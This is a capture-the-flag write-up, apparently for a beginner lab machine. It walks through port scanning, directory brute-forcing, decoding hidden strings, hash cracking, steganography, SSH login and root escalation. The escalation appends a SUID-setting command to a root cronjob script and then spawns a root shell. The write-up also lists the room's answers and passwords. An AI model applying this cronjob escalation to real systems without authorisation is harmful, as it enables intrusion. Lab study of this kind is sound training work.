Machine Info
Difficulty: Easy🟩
Link: HERE
Avg time: 45 Minutes
OS: Linux
Description: Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.
Task 1
Enumeration starts with nmap.
sudo nmap -Pn -sV -sC -n -T4 -p- -oN scan.txt 10.113.130.85
Three ports are open:
- 80/tcp - HTTP
- 6498/tcp - SSH
- 65524/tcp - HTTP
Question 1
How many ports are open? Answer: 3
Question 2
What is the version of nginx? Answer: 1.16.1
Question 3
What is running on the highest port? Answer: Apache
Task 2
Port 80 serves the nginx default page.
INFO:
Feroxbusterwas used instead ofgobuster, but both commands are provided.
Running:
feroxbuster -u 'http://[IP]' --wordlist /usr/share/dirb/wordlists/common.txt
# or
gobuster dir -u 'http://[IP]' -w /usr/share/dirb/wordlists/common.txt
Scan reveals robots.txt, but it contains nothing useful. There is also hidden/, which displays a creepy image. Source code reveals nothing. Ferox also finds hidden/whatever/, which shows a mountain landscape. The page source contains a paragraph with a hidden attribute.
<!DOCTYPE html>
<html>
<head>
<title>dead end</title>
<style>
body {
background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
background-repeat: no-repeat;
background-size: cover;
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<center>
<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>
</center>
</body>
</html>
Decoding it with CyberChef gives flag{REDACTED}.
Port 65524 shows the Apache default page. Source code contains another hidden paragraph.
<p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>
The hint suggests Base encoding. Trying all Base variants in CyberChef shows that only Base62 produces readable output. It decodes to /n0th1ng3ls3m4tt3r. On the same page, another flag is embedded in the Apache page HTML.
<li>
They are activated by symlinking available
configuration files from their respective
Fl4g 3 : flag{REDACTED}
*-available/ counterparts. These should be managed
by using our helpers
<tt>
a2enmod,
a2dismod,
</tt>
<tt>
a2ensite,
a2dissite,
</tt>
and
<tt>
a2enconf,
a2disconf
</tt>. See their respective man pages for detailed information.
</li>
Visiting /n0th1ng3ls3m4tt3r shows a page with a 'matrix' image and a hash.

Running john with the provided wordlist fails, most likely because the wrong format is used. To fix this, john is run against every format that hashid suggested.
for f in Snefru-256 Raw-SHA256 RIPEMD-256 HAVAL-256-3 gost gost-crypto Raw-SHA3-256 skein-256 skein-512-256; do john hash.txt --wordlist=~/Desktop/easypeasy.txt --format=$f ; done
John cracks the hash. The format is GOST, a Russian alternative to SHA256.
The cracked password matches the filename of the image on the page, suggesting steganography. It is used as a passphrase to extract secrettext.txt from the image.
steghide extract -sf binarycodepixabay.jpg
The file contains username boring in plain text and a password in binary.
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
The binary decodes to iconvertedmypasswordtobinary. Logging in via SSH as boring and reading /home/boring/user.txt reveals the user flag.
User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}
The flag looks like a Caesar or Vigenère cipher. Cipher Identifier identifies it as Caesar. Trying each shift manually, shift 13 decodes it to flag{REDACTED}.
INFO: ROT13 is simply the same as Ceasar cipher with 13 shifts.
The room description mentions vulnerable cronjobs, so /etc/crontab is checked.
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
Root runs .mysecretcronjob.sh every minute. The file is writable and owned by boring, so a SUID bit can be set on /bin/bash.
The following payload is appended to the script.
echo 'chmod +s /bin/bash' >> /var/www/.mysecretcronjob.sh
After the cronjob fires, running
bash -p
gives a root shell.
Question 1
Using GoBuster, find flag 1. Answer: flag{REDACTED}
Question 2
Further enumerate the machine, what is flag 2? Answer: flag{REDACTED}
Question 3
Crack the hash with easypeasy.txt, What is the flag 3? Answer: flag{REDACTED}
Question 4
What is the hidden directory? Answer: /n0th1ng3ls3m4tt3r (PEAK Reference to Metallica)
Question 5
Using the wordlist that provided to you in this task crack the hash what is the password? Answer: mypasswordforthatjob
Question 6
What is the password to login to the machine via SSH? Answer: iconvertedmypasswordtobinary
Question 7
What is the user flag? Answer: flag{REDACTED}
Question 8
What is the root flag? Answer: flag{REDACTED}






Top comments (0)